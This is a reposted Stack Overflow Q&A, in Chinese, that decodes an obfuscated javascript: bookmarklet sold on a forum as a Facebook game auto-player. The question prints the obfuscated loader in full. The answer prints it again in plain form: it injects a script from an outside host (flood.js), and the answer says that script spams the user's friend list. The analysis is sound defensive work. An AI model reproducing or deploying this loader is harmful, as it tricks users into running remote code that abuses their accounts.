gpt4 book ai didi

javascript - 有人可以解密这个javascript

转载 作者:可可西里 更新时间:2023-11-01 02:52:32 24 4
gpt4 key购买 nike

我在一个论坛上找到它,告诉我这段代码可以让我自动玩 facebook 游戏,但我担心这不是他们所说的,我担心这是恶意脚本

请帮忙:)

javascript:var _0x8dd5=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x8dd5[2]](_0x8dd5[1]))[_0x8dd5[0]]=_0x8dd5[3];b[_0x8dd5[5]][_0x8dd5[4]](a); void (0);

最佳答案

让我们从解码转义序列开始,去掉 _0x8dd5 变量名:

var x=[
"src","script","createElement","http://ug-radio.co.cc/flood.js",
"appendChild","body"
];
(a=(b=document)[x[2]](x[1]))[x[0]]=x[3];
b[x[5]][x[4]](a);
void (0);

替换数组中的字符串,您将得到:

(a=(b=document)["createElement"]("script"))["src"]="http://ug-radio.co.cc/flood.js";
b["body"]["appendChild"](a);
void (0);

因此,脚本的作用很简单:

a = document.createElement("script");
a.src = "http://ug-radio.co.cc/flood.js";
document.body.appendChild(a);
void (0);

即它在页面中加载 Javascript http://ug-radio.co.cc/flood.js

查看加载文件中的脚本,它称自己为“X-Cisadane 的 Wallflood”。它似乎获得了您的 friend 列表并向(或可能来自)所有人发布消息。

当然与游戏的自动播放无关。

关于javascript - 有人可以解密这个javascript,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/6556853/

24 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com